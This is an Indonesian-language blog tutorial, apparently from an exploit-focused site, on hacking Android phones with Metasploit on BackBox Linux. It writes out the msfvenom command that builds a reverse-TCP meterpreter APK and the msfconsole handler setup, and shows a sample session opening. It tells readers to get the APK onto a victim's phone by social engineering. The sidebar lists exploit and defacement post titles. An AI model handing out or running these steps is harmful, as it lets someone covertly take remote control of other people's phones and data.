• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Tutorial Hack Android dengan Metasploit di BackBox Linux

September 6, 2015 by Jack Wilder Leave a Comment

Assalamualaikum..
Kali ini saya akan share tutorial hack android dengan Metasploit di Backbox Linux. Tapi tentu saja kita membutuhkan payloads yang akan dijadikan umpan .

Pertama, buka terminal dan jalankan perintah ifconfig
Ini untuk mengetahui ip kita yang akan digunakan sebagai lhost nya.
Lalu masukkan perintah berikut :

msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip kita] LPORT=1337 R > payload.apk

payload.apk ini yang akan digunakan sebagai payloads. Terserah dinamai apa.
Lalu buka msfconsole.

root@sistem:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [ip kita]
LHOST => 192.168.1.67
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > exploit

Setelah itu, kita share payload.apk tadi ke Android korban. Dan korban harus menginstall nya. Terserah pakai cara apa. Gunakan social engineering mu.
Dan tunggu di terminal mu sampai masuk ke meterpreter session.

[*] Started reverse handler on 10.11.12.29:1337
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 10.11.12.179
[*] Meterpreter session 1 opened (10.11.12.29:1337 -> 10.11.12.179:49164) at 2015-9-03 02:07:42 +0700

Another cool stuff :
  • Backdooring APK Files With Metasploit Payloads
Video :
Backdooring APK With Metasploit Payloads
Sekian tutor kali ini semoga bermanfaat.
Shares

Filed Under: Metasploit Tagged With: Android, BackBox, Exploit, Hacking, Metasploit

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Reverse Shell From Local File Inclusion Exploit

Laravel PHPUnit Remote Code Execution

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Exploit WordPress Ajax Load More PHP Upload Vulnerability

WordPress 4.7.0/4.7.1 Content Injection Exploit

WordPress Plugin CopySafe PDF Protection Shell Upload

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Uptimerobot.com Custom Domain or Subdomain Takeover

Mass Deface setelah Rooting Server

LinuxSec / 77 queries in 0.54 seconds